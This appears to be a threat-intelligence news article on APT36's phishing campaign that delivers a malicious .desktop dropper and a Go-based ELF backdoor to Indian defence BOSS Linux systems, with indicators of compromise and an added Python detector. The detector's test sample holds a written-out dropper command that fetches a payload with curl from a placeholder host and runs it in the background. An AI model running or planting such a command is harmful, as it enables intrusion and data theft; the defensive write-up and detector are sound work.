APT36 Attacking BOSS Linux Systems With Weaponized ZIP Files to Steal Sensitive Data
Pakistan-based threat actor APT36, also known as Transparent Tribe, has significantly evolved its cyber-espionage capabilities by launching a sophisticated campaign specifically targeting Indian defense personnel through weaponized ZIP files designed to compromise BOSS Linux systems. 

This development marks a notable shift in the group’s operational tactics, moving from traditional Windows-based attacks to Linux-focused infiltration methods that exploit the widespread use of BOSS Linux within Indian government agencies.

Key Takeaways
1. APT36, a Pakistan-based threat actor, shifts from Windows to Linux-specific attacks against government systems.
2. Phishing emails contain .desktop files that show decoy presentations while installing BOSS.elf payload.
3. The BOSS.elf payload performs system reconnaissance, screenshot capture, and persistent C2 communication with 101.99.92.182:12520.
4. Organizations must enhance email filtering, disable untrusted .desktop execution, and deploy Linux-specific detection tools.

Phishing Technique Exploits Linux Desktop Files

CYFIRMA reports that the attack campaign employs a multi-stage infiltration process that begins with carefully crafted phishing emails containing ZIP file attachments named “Cyber-Security-Advisory.zip.” 
Once extracted, the archive reveals a malicious .desktop file identified as “Cyber-Security-Advisory.desktop” with MD5 hash 6eb04445cad300c2878e8fbd3cb60b52. 

This Linux shortcut file contains sophisticated command sequences designed to execute silently without user detection.

The malicious .desktop file utilizes several key parameters: Type=Application ensures system execution, Terminal=false prevents visible terminal windows, and Icon=libreoffice-impress disguises the file as a legitimate presentation. 
The embedded Bash commands change the working directory to /tmp and execute dual curl commands. 

The first downloads “slide.pptx” from the attacker-controlled domain sorlastore.com, which, despite its filename extension, contains an HTML iframe displaying a decoy blog page.

Simultaneously, a second curl command downloads the primary payload, a malicious ELF binary named BOSS.elf (MD5: 18cf1e3be0e95be666c11d1dbde4588e), which is saved locally as “client.elf” and executed using nohup for persistent background operation.
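As an added, defender-side example that is not part of CYFIRMA's report, the following Python script scores a .desktop file against the traits described above (shell spawned with -c, curl download, /tmp staging, nohup backgrounding, an office-suite icon on an entry that never launches the suite, Terminal=false). The two sample entries and the staging.invalid host are constructed for the test, not the campaign's artifacts.

```python
import re
# Heuristics for the .desktop dropper pattern described above; each is (regex over Exec, reason).
CHECKS = [
    (r"\b(ba)?sh\b\s+-c\b", "Exec spawns a shell with -c"),
    (r"\b(curl|wget)\b", "Exec fetches content with curl/wget"),
    (r"/(tmp|var/tmp|dev/shm)\b", "Exec works out of a world-writable staging directory"),
    (r"\bnohup\b|&\s*[\"']?\s*$", "Exec backgrounds a process (nohup or trailing &)"),
]
OFFICE_ICONS = ("libreoffice", "impress", "writer", "calc")

# Constructed samples, not the campaign's artifacts; staging.invalid is a placeholder host.
BENIGN = """[Desktop Entry]
Type=Application
Icon=libreoffice-impress
Terminal=false
Exec=libreoffice --impress %U
"""
SUSPICIOUS = """[Desktop Entry]
Type=Application
Icon=libreoffice-impress
Terminal=false
Exec=bash -c "cd /tmp && curl -s https://staging.invalid/slide.pptx -o slide.pptx && curl -s https://staging.invalid/BOSS.elf -o client.elf && nohup ./client.elf &"
"""

def parse_desktop(text):
    """Return the key/value pairs of the [Desktop Entry] group."""
    entry, in_group = {}, False
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("["):  # group header
            in_group = line == "[Desktop Entry]"
        elif in_group and "=" in line and not line.startswith("#"):
            key, _, value = line.partition("=")
            entry[key.strip()] = value.strip()
    return entry

def flag_desktop(text):
    """Return the reasons a .desktop file looks like a download-and-execute dropper."""
    entry = parse_desktop(text)
    cmd = entry.get("Exec", "")
    reasons = [reason for pattern, reason in CHECKS if re.search(pattern, cmd)]
    icon = entry.get("Icon", "").lower()
    # An office-suite icon on an entry that never launches the suite is the decoy trick.
    if any(tag in icon for tag in OFFICE_ICONS) and not re.search(r"libreoffice|soffice", cmd):
        reasons.append("Icon mimics an office app that Exec never launches")
    # Terminal=false only matters once the entry is already doing shell work.
    if reasons and entry.get("Terminal", "").lower() == "false":
        reasons.append("Terminal=false hides the shell from the user")
    return reasons
```

Run it over ~/Desktop, ~/.local/share/applications and mail-attachment extraction directories; an empty list means no dropper traits were found, and each string is one reason to quarantine the file.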

Advanced Go-Based Malware Capabilities

The Go-language-based malware demonstrates advanced capabilities across multiple attack vectors. 

Static analysis reveals extensive reconnaissance functions including system hostname identification, CPU and RAM profiling, and runlevel inspection through systemctl commands. 

The malware employs main.junkcalc2 for activity logging and evasion techniques, while Main.getDrives and os.readDir functions enable comprehensive file system discovery and data collection.
Command and control operations utilize main.loadConfig to retrieve server details, establishing TCP connections to IP address 101.99.92[.]182:12520. 

The malware maintains persistent communication through setKeepAlive and setKeepAlivePeriod functions, automatically attempting reconnection every 30 seconds.

Data collection capabilities include the “github.com/kbinani/screenshot” library for desktop capture and main.sendResponse function for exfiltrating various data types, including files, command outputs, and system information.
The campaign aligns with multiple MITRE ATT&CK framework techniques, including T1566 (Phishing), T1543 (Create or Modify System Process), and T1071 (Application Layer Protocol), demonstrating sophisticated operational security. 

Organizations utilizing BOSS Linux systems should immediately implement enhanced email filtering, disable .desktop file execution from untrusted sources, and deploy endpoint detection capabilities specifically configured for Linux-based threats.